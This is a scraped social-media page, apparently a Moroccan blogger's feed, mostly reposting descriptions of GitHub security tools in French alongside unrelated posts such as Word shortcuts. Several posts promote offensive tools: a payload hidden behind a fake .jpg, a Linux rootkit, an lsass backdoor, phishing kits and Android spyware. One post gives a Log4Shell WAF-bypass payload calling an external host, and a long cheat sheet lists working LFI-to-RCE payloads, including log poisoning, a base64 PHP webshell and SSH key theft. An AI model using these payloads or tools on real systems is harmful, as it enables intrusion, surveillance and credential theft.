MPS

Magma Prototype Studio

08/07/2022

J'arrête Facebook.

12/03/2022

DOME :-- Un outil d'énumération de sous-domaine.

Caractéristiques:-
1. Facile à utiliser. Installez simplement le requirements.txt et exécutez
2. Analyse active et passive (lire ci-dessus)
3. Plus rapide que les autres outils d'énumération de sous-domaines
4. 7 résolveurs/serveurs de noms différents, y compris google, cloudfare (le plus rapide), Quad9 et cisco DNS (utilisez --resolvers filename.txt pour utiliser une liste personnalisée de résolveurs, un par ligne)
5. Jusqu'à 21 sources OSINT différentes
6. Les sous-domaines obtenus via OSINT sont testés pour savoir s'ils sont vivants (uniquement en mode actif)
7. Prise en charge des sites Web nécessitant un jeton API
8. Détecte quand la clé api ne fonctionne plus (d'autres outils génèrent simplement une erreur et cessent de fonctionner)
9. Détection et contournement des caractères génériques
10. Analyse de port personnalisée et paramètres intégrés pour les ports Top100, Top1000 et Top Web
11. Sortie colorée et non colorée pour une lecture facile
Prise en charge de Windows et Python 2/3 (Python 3 est recommandé)
12. Hautement personnalisable grâce à des arguments
13. Scannez plus d'un domaine simultanément
14. Possibilité d'utiliser des threads pour des analyses bruteforce plus rapides
15. Exportez la sortie dans différents formats tels que txt, json, html

Avis de non-responsabilité : - Ce projet a été créé à des fins éducatives et ne doit pas être utilisé dans des environnements sans autorisation légale.

de téléchargement:-

https://github.com/v4d1/Dome

github.com

GitHub - Yamato-Security/hayabusa: Hayabusa is a sigma-based threat hunting and fast forensics timeline generator for Windows event logs written in Rust. 12/03/2022

Hayabus :-- une chasse aux menaces basée sur sigma et un générateur de chronologie d'investigation rapide pour les journaux d'événements Windows écrits en Rust.

Caractéristiques:-
1. Prise en charge multiplateforme : Windows, Linux, macOS
2. Développé en Rust pour être sûr de la mémoire et plus rapide qu'un faucon hayabusa !
3. Prise en charge multi-thread offrant jusqu'à 5 fois plus de vitesse !
4. Crée une chronologie CSV unique et facile à analyser pour les enquêtes médico-légales et la réponse aux incidents
5. Chasse aux menaces basée sur les signatures IoC écrites dans des règles hayabusa faciles à lire/créer/modifier basées sur YML
6. Prise en charge des règles Sigma pour convertir les règles sigma en règles hayabusa
7. Actuellement, il prend en charge le plus de règles sigma par rapport à d'autres outils similaires et prend même en charge les règles de comptage
8. Statistiques du journal des événements (utiles pour obtenir une image des types d'événements et pour régler les paramètres de votre journal)
9. Configuration du réglage des règles en excluant les règles inutiles ou bruyantes
10. Cartographie MITRE ATT&CK

Avis de non-responsabilité : - Ce projet a été créé à des fins éducatives et ne doit pas être utilisé dans des environnements sans autorisation légale.

de téléchargement:-

https://github.com/Yamato-Security/hayabusa

GitHub - Yamato-Security/hayabusa: Hayabusa is a sigma-based threat hunting and fast forensics timeline generator for Windows event logs written in Rust. Hayabusa is a sigma-based threat hunting and fast forensics timeline generator for Windows event logs written in Rust. - GitHub - Yamato-Security/hayabusa: Hayabusa is a sigma-based threat hunting ...

GitHub - DR34M-M4K3R/GhostRecon: An OSINT framework updated weekly, wich with you can search on precise targets, with a lot of features like person search, criminal search, or social media scanning with eamail/phone, and ip changer 10/03/2022

GhostRecon :-- Un framework OSINT mis à jour chaque semaine, avec lequel vous pouvez effectuer des recherches sur des cibles précises, avec de nombreuses fonctionnalités telles que la recherche de personnes, la recherche de criminels ou l'analyse des médias sociaux avec e-mail/téléphone et changeur d'adresse IP.

Avis de non-responsabilité : - Ce projet a été créé à des fins éducatives et ne doit pas être utilisé dans des environnements sans autorisation légale.

# Lien de téléchargement:

https://github.com/DR34M-M4K3R/GhostRecon

GitHub - DR34M-M4K3R/GhostRecon: An OSINT framework updated weekly, wich with you can search on precise targets, with a lot of features like person search, criminal search, or social media scanning with eamail/phone, and ip changer An OSINT framework updated weekly, wich with you can search on precise targets, with a lot of features like person search, criminal search, or social media scanning with eamail/phone, and ip change...

GitHub - trailofbits/MUI: A GUI plugin for Binary Ninja to easily interact with and view the progress of Manticore 24/12/2021

MUI : - Un plugin d'interface graphique pour Binary Ninja pour interagir facilement avec et visualiser les progrès de Manticore.

Avec le projet d'interface utilisateur Manticore (MUI), nous fournissons un plugin d'interface utilisateur graphique pour Binary Ninja pour permettre aux utilisateurs d'interagir facilement avec et de visualiser la progression du moteur d'exécution symbolique Manticore pour l'analyse des contrats intelligents et des binaires natifs.

Caractéristiques:-

1. Trouver le chemin vers cette instruction / Supprimer l'instruction de la liste de recherche
2. Éviter cette instruction / Supprimer l'instruction de la liste à éviter
3. Ajouter/Modifier un crochet personnalisé
4. Résoudre avec Manticore / Arrêter Manticore

Avis de non-responsabilité : - Ce projet a été créé à des fins éducatives et ne doit pas être utilisé dans des environnements sans autorisation légale.

de téléchargement:-

https://github.com/trailofbits/MUI

GitHub - trailofbits/MUI: A GUI plugin for Binary Ninja to easily interact with and view the progress of Manticore A GUI plugin for Binary Ninja to easily interact with and view the progress of Manticore - GitHub - trailofbits/MUI: A GUI plugin for Binary Ninja to easily interact with and view the progress of M...

GitHub - Tsuyoken/ImgBackdoor: Hide your payload into .jpg file 17/12/2021

ImgBackdoor :-- Cachez votre charge utile dans le fichier .jpg.

Ce module prend une image.jpg existante et une payload.ps1 (saisie par l'utilisateur) et construit une nouvelle charge utile (agent.jpg.exe) qui, si elle est exécutée, déclenchera le téléchargement des 2 fichiers précédents stockés dans apache2 (image. jpg + payload.ps1) et exécutez-les.

Ce module modifie également l'icône agent.exe pour qu'elle corresponde à un fichier.jpg Ensuite, utilise la méthode d'usurpation « Masquer les extensions pour les types de fichiers connus » pour masquer l'extension agent.exe.

Toutes les charges utiles (entrée utilisateur) seront téléchargées à partir de notre serveur Web Apache2
et exécuté dans la RAM cible. La seule extension (charge utile saisie par l'utilisateur)
qui nécessitent d'écrire la charge utile sur le disque sont des binaires .exe.

Avis de non-responsabilité : - Ce projet a été créé à des fins éducatives et ne doit pas être utilisé dans des environnements sans autorisation légale.

de téléchargement:-

https://github.com/Tsuyoken/ImgBackdoor

GitHub - Tsuyoken/ImgBackdoor: Hide your payload into .jpg file Hide your payload into .jpg file. Contribute to Tsuyoken/ImgBackdoor development by creating an account on GitHub.

GitHub - gentilkiwi/kekeo: A little toolbox to play with Microsoft Kerberos in C 15/12/2021

Kekeo : - Une petite boîte à outils pour jouer avec Microsoft Kerberos en C.

C'était le seul générateur/bibliothèque de code que j'ai trouvé pour fonctionner facilement avec le projet Microsoft C.

1. fonctionne sans beaucoup de dépendances ;
2. documentation magique ;
3. soutien merveilleux pour mes questions stupides ;
4. avait un binaire qui fonctionnait seulement quelques heures après le démarrage de mon projet...

Avis de non-responsabilité : - Ce projet a été créé à des fins éducatives et ne doit pas être utilisé dans des environnements sans autorisation légale.

de téléchargement:-

https://github.com/gentilkiwi/kekeo

GitHub - gentilkiwi/kekeo: A little toolbox to play with Microsoft Kerberos in C A little toolbox to play with Microsoft Kerberos in C - GitHub - gentilkiwi/kekeo: A little toolbox to play with Microsoft Kerberos in C

13/12/2021

Found a bypass working for a few WAF

${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a}

Enjoy bounty season with

GitHub - V1V1/OffensiveAutoIt: Offensive tooling notes and experiments in AutoIt v3 (https://www.autoitscript.com/site/autoit/) 26/11/2021

OffensiveAutoIt : - Notes et expériences sur l'outillage offensif dans AutoIt v3.

Pourquoi AutoIt ?

1. Beaucoup d'exemples en ligne montrant qu'AutoIt est utilisé pour le développement de logiciels malveillants, mais aucune ressource générale que j'ai pu trouver que les personnes novices en matière de sécurité peuvent utiliser pour explorer ses capacités et ses nuances.

2. Possibilité d'appeler directement des fonctions DLL externes et API Windows.

3. Les scripts peuvent être exécutés à l'aide d'AutoIt3.exe (binaire signé numériquement) ou compilés dans des exécutables autonomes.

4. Simplifie l'automatisation et l'interaction de l'interface utilisateur ; Création d'interface graphique, simulation de frappes et de mouvements de souris, manipulation de fenêtres et de processus.

5. Communauté très active et d'innombrables fonctions définies par l'utilisateur (UDF).

Avis de non-responsabilité : - Ce projet a été créé à des fins éducatives et ne doit pas être utilisé dans des environnements sans autorisation légale.

de téléchargement:-

https://github.com/V1V1/OffensiveAutoIt

GitHub - V1V1/OffensiveAutoIt: Offensive tooling notes and experiments in AutoIt v3 (https://www.autoitscript.com/site/autoit/) Offensive tooling notes and experiments in AutoIt v3 (https://www.autoitscript.com/site/autoit/) - GitHub - V1V1/OffensiveAutoIt: Offensive tooling notes and experiments in AutoIt v3 (https://www.a...

GitHub - loseys/Goblyn: Goblyn is a Python tool focused to enumeration and capture of website files metadata. 24/11/2021

Goblyn : -- Un outil Python axé sur l'énumération et la capture des métadonnées des fichiers de sites Web.

Comment ça fonctionne?
Goblyn recherchera les répertoires actifs sur le site Web et énumérera ainsi les fichiers. S'il trouve un fichier, il obtiendra les métadonnées du fichier.

Pourquoi Goblyn ?
1. Prend en charge plusieurs types de fichiers ;
2. Simple à utiliser ;
3. Installation facile ;
4. Rapide.

Avis de non-responsabilité : - Ce projet a été créé à des fins éducatives et ne doit pas être utilisé dans des environnements sans autorisation légale.

de téléchargement:-

https://github.com/loseys/Goblyn

GitHub - loseys/Goblyn: Goblyn is a Python tool focused to enumeration and capture of website files metadata. Goblyn is a Python tool focused to enumeration and capture of website files metadata. - GitHub - loseys/Goblyn: Goblyn is a Python tool focused to enumeration and capture of website files metadata.

Nosferatu - Lsass NTLM Authentication Backdoor 19/11/2021

Nosferatu - Lsass NTLM Authentication Backdoor Lsass NTLM Authentication Backdoor How it Works First, the DLL is injected into the lsass.exe process, and will begin hooking authentic...

831.51 GB folder on MEGA 15/11/2021

831.51 GB folder on MEGA 26200 files and 2786 subfolders

CVE-2019-12415: XML processing vulnerability in Apache POI - Pentestmag 06/11/2021

CVE-2019-12415: XML processing vulnerability in Apache POI - Pentestmag CVE-2019-12415: XML processing vulnerability in Apache POI by Artem Smotrakov Apache POI is a popular Java library for working with …

Upgrade from LFI to RCE via PHP Sessions 03/11/2021

Source : Frozen Flame

" LFI to RCE "

1. Apache Log Poisoning

GET /show.php?file=/var/log/apache2/access.log&c=ls HTTP/1.1
User-Agent:
2. SSH Log Poisoning

ssh ''.com

/show.php?file=/var/log/auth.log&c=ls

3. SMTP Log Poisoning

telnet target(.)com 25
MAIL FROM:
RCPT TO:

/show.php?file=/var/log/mail.log&c=ls

4. Image Upload

i. Add this to EXIF data of s.png:
ii. Upload the s.png.
iii. /show.php?file=../img/s.png&c=ls

5. /proc/self/environ

GET /show.php?file=../../proc/self/environ&c=ls HTTP/1.1
User-Agent:

If no success then try writing files.

6. php://filter

Read source code, it may contain sensitive data (username/passwords, private keys etc)->RCE
php://filter/convert.base64-encode/resource=index.php
php://filter/read=string.rot13/resource=index.php

"php://filter" is case insensitive. Try URL/Double encoding

7. Zip upload

echo "" > shell.php
zip shell(.)zip shell.php
mv shell(.)zip shell.jpg
rm shell.php

/show.php?file=zip://shell.jpg%23shell.php

8. data://text/plain:

/show.php?file=data://text/plain,
/show.php?file=data://text/plain,
/show.php?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pO2VjaG8gJ3NoZWxsISc7Pz4=

9. /proc/self/fd/{id}

Include shell in headers (User-Agent, Authorisation, Referrer etc) and access /proc/self/fd/{id}

10. /proc/$PID/fd/$FD

i. Upload a lot of shells.
ii. /show.php?file=/proc/$PID/fd/$FD

11. expect://

/show.php?page=expect://ls

12. input://

POST /index.php?page=php://input HTTP/1.1



13. RCE via vulnerable assert statement

Vulnerable Code: assert("strpos('$file', '..') === false") or die("Hacker!");

Payload: ' and die(system("whoami")) or '

14. Log files:

/var/log/apache/{access.log or error.log}
/var/log/apache2/error.log
/usr/local/{apache or apache2}/log/error_log
/var/log/nginx/{access.log or error.log}
/var/log/httpd/error_log

Insert payload via headers (User-Agent, Authorisation, Referrer etc)

15. Via PHP sessions: https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/

16. Via SSH:

If ssh is active check which user is being used (/proc/self/status & /etc/passwd) and try to access /.ssh/id_rsa

17. vsftpd Log Poisoning:

Try to login (ftp) with the PHP payload in the username and access /var/log/vsftpd.log

18. To automate, Use LFISuite.



Collected from,
https://twitter.com/tuhin1729_/

Happy hacking. ❤️

Upgrade from LFI to RCE via PHP Sessions I recently came across an interesting Local File Inclusion vulnerability in a private bug bounty program which I was able to upgrade to a Remote Code Ex*****on. The interesting fact about this and what makes it different is that the underlying operating system was pretty hardened and almost all usua...

01/09/2021

TurboDataMiner :-- L'objectif de cette extension Burp Suite est l'extraction flexible et dynamique, la corrélation et la présentation structurée des informations du projet Burp Suite ainsi que la modification flexible et dynamique à la volée des requêtes HTTP sortantes ou entrantes en utilisant scripts Python.

Ainsi, Turbo Data Miner aidera à obtenir un meilleur et plus rapide.

L'objectif de ces scripts Python est l'extraction, la corrélation et la présentation structurée flexibles et dynamiques des informations de l'état de Burp Suite ainsi que la modification flexible et dynamique à la volée des requêtes HTTP sortantes ou entrantes. Ainsi, Turbo Data Miner vous aidera à mieux comprendre et plus rapidement les données collectées et traitées par Burp Suite.

Avis de non-responsabilité : - Ce projet a été créé à des fins éducatives et ne doit pas être utilisé dans des environnements sans autorisation légale.

de téléchargement:-
https://github.com/chopicalqui/TurboDataMiner

26/08/2021

5 façons de gagner de l'argent en ligne rapidement

1. TESTER ET ÉVALUER LES SITES WEB POUR DU CASH
2. FAIRE LES TÂCHES DE QUELQU'UN D'AUTRE
3. REMPLISSEZ LES ENQUÊTES
4. MAGASINEZ EN LIGNE, LAISSEZ LA PÂTE ROULER
5. PRENDRE ET VENDRE VOS PHOTOS

19/08/2021

😂😂😂

19/08/2021

NinjaDroid:-- Ninja Reverse Engineering sur les packages Android APK.

NinjaDroid utilise apktool et dex2jar pour extraire et stocker : -

1. Fichier de rapport JSON, qui contient toutes les informations APK extraites
2. Fichier AndroidManifest.xml (merci à apktool)
3. Fichier de certificat numérique CERT.RSA/DSA
4. fichiers classes.dex
5. fichier .jar traduit (merci à dex2jar)
6. fichiers smali démontés (merci à apktool)
7. assets/ et res/ dossiers avec leur contenu (merci à apktool)

Avis de non-responsabilité : - Ce projet a été créé à des fins éducatives et ne doit pas être utilisé dans des environnements sans autorisation légale.

de téléchargement:-

https://github.com/rovellipaolo/NinjaDroid

15/08/2021

Enquêteur judiciaire sur le piratage informatique (CHFI) | Tous les supports de cours🔰

L'enquête médico-légale sur le piratage informatique consiste à détecter les attaques de piratage et à extraire correctement les preuves pour signaler le crime et mener des audits pour prévenir de futures attaques.

Enquêteur judiciaire sur le piratage informatique (CHFI)

01 Introduction à la criminalistique informatique
02 Processus de criminalistique informatique
03 Recherche et saisie
04 Preuve numérique
05 Procédures de premier intervenant
06 Laboratoire de médecine légale
07 Disque dur et systèmes de fichiers
08 Windows Forensics
09 Acquisition et duplication de données
10 Récupération de fichiers et de partitions supprimés
11 Utilisation des données d'accès FTK
12 Utilisation d'Encase
13 pirates de mot de passe
14 Correction du journal
15 Analyse de réseau
16 Attaque sans fil
17 attaques Web
18 Crimes par courrier électronique
19 Enquête mobile
20 Rapport d'enquête
21 Témoin expert

Du télégramme :

⭕️Lien : https://mega.nz/folder/bUxVXB6T

13/08/2021

Reptile :-- Linux.

Caractéristiques:-
1. Donnez root aux utilisateurs non privilégiés
2. Masquer les fichiers et répertoires
3. Masquer les processus
4. Se cacher
5. Masquer les connexions TCP/UDP
6. Persistance de démarrage cachée
7. Altération du contenu du fichier
8. Quelques techniques d'obscurcissement
9. Porte dérobée de port ICMP/UDP/TCP
10. Shell TTY/PTY complet avec transfert de fichiers
11. Client pour gérer Reptile Shell
12. Shell se reconnecte toutes les X fois (pas par défaut)

Avis de non-responsabilité : - Ce projet a été créé à des fins éducatives et ne doit pas être utilisé dans des environnements sans autorisation légale.

de téléchargement:-

https://github.com/f0rb1dd3n/Reptile

10/08/2021

N'oubliez jamais que votre présence en ligne doit être prise en charge. Faites attention aux détails et soyez présent là où les clients pourraient rechercher ce que vous proposez.

08/08/2021

HawkScan :-- Outil de sécurité pour la reconnaissance et la collecte d'informations sur un site Web. (python 3.x).

Caractéristiques spéciales : -
1. Testez la sauvegarde/l'ancien fichier sur tous les fichiers trouvés (index.php.bak, index.php~...)
2. Vérifiez les informations d'en-tête
3. Vérifiez les informations DNS
4. Vérifiez les e-mails sur le site Web et en même temps si des e-mails ont été divulgués (rapport)
5. Détection CMS + version et vulnérabilités
6. Système de sauvegarde (si le script s'est arrêté, il reprend au même endroit)
7. Détection WAF et erreur de réponse au WAF + Test de contournement
8. Vérifiez Github
9. Option --exclude pour exclure la page, l'erreur de code, les octets
10. Option rate-limit si l'application est instable (--timesleep)
11. Arrivée à la waybackmachine
12. Vérifiez si la base de données firebaseio existe et est accessible
13. Rechercher des compartiments S3 dans la page de code source
14. Tester s'il est possible de scanner avec l'hôte "localhost"
15. Essayez différents contournements pour l'erreur de code 403
16. Analyse et analyse JS (option --js)
17. Vérifiez Google Dork
18. Vérifiez l'adresse IP de l'hôte
19. Redimensionnement automatique par rapport à la fenêtre
20. Vérifiez le nom de domaine de sauvegarde (ex : www.domain.com/domain.zip)
21. Vérifiez la connexion socketio
22. Notifier lorsque l'analyse est terminée (ne fonctionne que sur Linux)

Avis de non-responsabilité : - Ce projet a été créé à des fins éducatives et ne doit pas être utilisé dans des environnements sans autorisation légale.

de téléchargement:-

https://github.com/c0dejump/HawkScan

08/08/2021

Meilleur livre pour les apprenants Linux pour créer votre propre interface de programmation.
Lien du fichier PDF : https://bit.ly/3xvyqi2

08/08/2021
05/08/2021

Pot au noir : - Un outil d'ingénierie inverse Flutter/Dart.

Pot au noir est un outil d'ingénierie inverse pour les applications ciblant . Concrètement, il s'agit d'un parseur et d'un extracteur d'informations pour le binaire Android Flutter/Dart, classiquement nommé libapp. Alors, pour toutes les versions de Dart version 2.10. Lorsqu'il est exécuté, il génère un vidage complet de toutes les classes présentes dans l'instantané d'isolat.

Avis de non-responsabilité : - Ce projet a été créé à des fins éducatives et ne doit pas être utilisé dans des environnements sans autorisation légale.

de téléchargement:-

https://github.com/rscloura/Doldrums

02/08/2021

SHARK : - L'avenir du phishing avec moins de re**rd.

Un requin est un outil qui vous aidera à faire du phishing de manière avancée afin que personne ne vérifie et n'identifie que vous faites du phishing. ou des données, telles que des noms d'utilisateur, des mots de passe, en se déguisant en une entité digne de confiance dans une communication électronique.Généralement effectué par l'usurpation d'e-mail, la messagerie instantanée et la messagerie texte, l'hameçonnage incite souvent les utilisateurs à saisir des informations personnelles sur un faux site Web qui correspond au l'apparence et la convivialité du site légitime, comme indiqué dans MR ROBOT.

Avis de non-responsabilité : - Ce projet a été créé à des fins éducatives et ne doit pas être utilisé dans des environnements sans autorisation légale.

de téléchargement:-

https://github.com/Bhaviktutorials/shark

30/07/2021

Erataka té 🐆

28/07/2021

𝐋𝐢𝐬𝐭𝐞 𝐝𝐞𝐬 𝐫𝐚𝐜𝐜𝐨𝐮𝐫𝐜𝐢𝐬 𝐜𝐥𝐚𝐯𝐢𝐞𝐫 𝐖𝐨𝐫𝐝

Working with documents
1-Open an Existing document: Ctrl + O
2-Create a new document: Ctrl + N
3-Save the current document: Ctrl + S
4-Open the Save as window: F12
5-Print the current document: Ctrl + P
6-Close the current document: Ctrl + W
7-Split the window: Alt + Ctrl + S

Move around in a document
8-Move the insertion point: Arrow
9-Move a word: Ctrl + Left / Right Arrow
10-Move a paragraph: Ctrl + Up / down arrow
11-Go to the beginning of the current line: Home
12-Go to the beginning of the document: Ctrl + Home
13-Go to the end of the current line: Ctrl + End
14-Go to the end of the document: Ctrl + End.

Modification of documents
14-Cut the current selection: Ctrl + X
15-Copy current selection: Ctrl + C
16-Paste the contents of the clipboard: Ctrl + V
17-Bold: Ctrl + B
18-Italic: Ctrl + I
19-Underline: Ctrl + U
20-Underline words only: Ctrl + Shift + W
21-Center: Ctrl + E
22-Reduce the font: Ctrl + [
23-Enlarge the font: Ctrl +]
24-Change the text to uppercase: Ctrl + Shift + A
25-Change text to lowercase: Ctrl + Shift + K
26-Insert a page break: Ctrl + Enter
27-Add hyperlink: Ctrl + K
Text selection

28-Select the whole document: Ctrl + A
29-Select the text one character at a time: Shift + Arrow
30-Select the text one word at a time: Ctrl + Shift + Arrow
31-Enter selection mode: F8

Using tables
32-Go to the next cell: Tab
33-Go to the previous cell: Shift + Tab
34-Go to the first cell of a line: Alt + Home
35-Go to the last cell of a line: Alt + End
36-Move to the top of a column: Alt + Previous page
37-Move down a column: Alt + Next page
General tasks

38-Undo the last action: Ctrl + Z
39-Repeat last action: Ctrl + Y
40-Assist: F1
41-Zoom: Alt + W, Q
42-Cancel: Esc

These keyboard shortcuts are the ones I use most often. There are of course other shortcuts that you can see by going to Microsoft Word's built-in help function (shortcut key F1) and looking for keyboard shortcuts. Hope these shortcut keys can help you improve your efficiency when using Microsoft Word.

Photos from MPS's post 28/07/2021

WAI2K : -- Un outil d'automatisation de première ligne pour filles.

L'objectif principal de cet outil est d'étudier l'efficacité de l'utilisation de diverses techniques de vision par ordinateur pour automatiser et optimiser divers aspects des jeux vidéo. Toute utilisation de cet outil est à vos risques et périls. Personne ne sera responsable de tout ce qui vous arrivera à vous ou à votre propre compte, à l'exception de vous-même.

Caractéristiques:-
1. Soutien logistique
2. Soutien au combat (limité aux cartes mises en œuvre)
3. Cadavre traînant
4. Amélioration automatique
5. Démontage automatique
6. Rapports de combat automatique, faites faire des heures supplémentaires à Kalina !
7. Simulations de combat automatique
8. Intégration de Discord
9. Peut fonctionner en arrière-plan sans prendre en charge la souris du bureau

Avis de non-responsabilité : - Ce projet a été créé à des fins éducatives et ne doit pas être utilisé dans des environnements sans autorisation légale.

de téléchargement:-

https://github.com/waicool20/WAI2K

Photos from MPS's post 27/07/2021

Spyware Android : - Application Web Rails pour espionner les appareils .

Le projet est un logiciel espion Android basé sur une console web, qui permet d'accéder à distance aux fonctionnalités d'un smartphone : contacts, SMS, caméra, microphone, système de fichiers, etc.

L'outil:-

1. Utilisez des conteneurs Docker pour simuler un environnement Kali Linux avec le framework

2. Utilisez les appels RPC pour communiquer avec le framework Metasploit

3. Utilisez ADB pour installer la charge utile sur l'appareil cible (l'appareil doit être sur le même réseau local)

Avis de non-responsabilité : - Ce projet a été créé à des fins éducatives et ne doit pas être utilisé dans des environnements sans autorisation légale.

https://github.com/CanciuCostin/andro

Want your public figure to be the top-listed Public Figure in Marrakesh?
Click here to claim your Sponsored Listing.

Videos (show all)

Essaye de ne pas rire 😂😂

Category

Website

Address


Rue Beni Marine, Poste Du Maroc
Marrakesh
23016

Other Bloggers in Marrakesh (show all)
الشيخ سليمان بن فتح الله الشيخ سليمان بن فتح الله
Marrakesh

صفحة ننشر مقاطع فيديو متنوعة

Shop Zorq Shop Zorq
Zone 16
Marrakesh, 40000

Hello sir/madam, I am always at your service..

Fayssl lahkimi Fayssl lahkimi
Uz
Marrakesh, 89

Modwana chkhsya

المقنع - the masked المقنع - the masked
الفخارة
Marrakesh, 40150

تذكر ، ما دمت تتنفس ، لم يفت الأوان أبدًا لبدء بداية جديدة

Chop by nour Chop by nour
Marrakesh, 40000

Houssam Banani  حسام بناني Houssam Banani حسام بناني
Marrakesh

صفحة حسام بناني تدعم كل المثليين والمثليات في كل انحاء العالم�

GuilMini GuilMini
Marrakesh

shopping and retail

NX REMIX NX REMIX
Marrakesh

Let's get to 100k❤️

TIGMI NIMAZIGHN TIGMI NIMAZIGHN
Marrakesh

DARIF.yt DARIF.yt
123
Marrakesh

أفضل صفحة خاصة بالأنمي

Anime bunny Anime bunny
Maroc
Marrakesh, 40000

Gohan Gohan
مولاي الحسن
Marrakesh

للمتعة فقط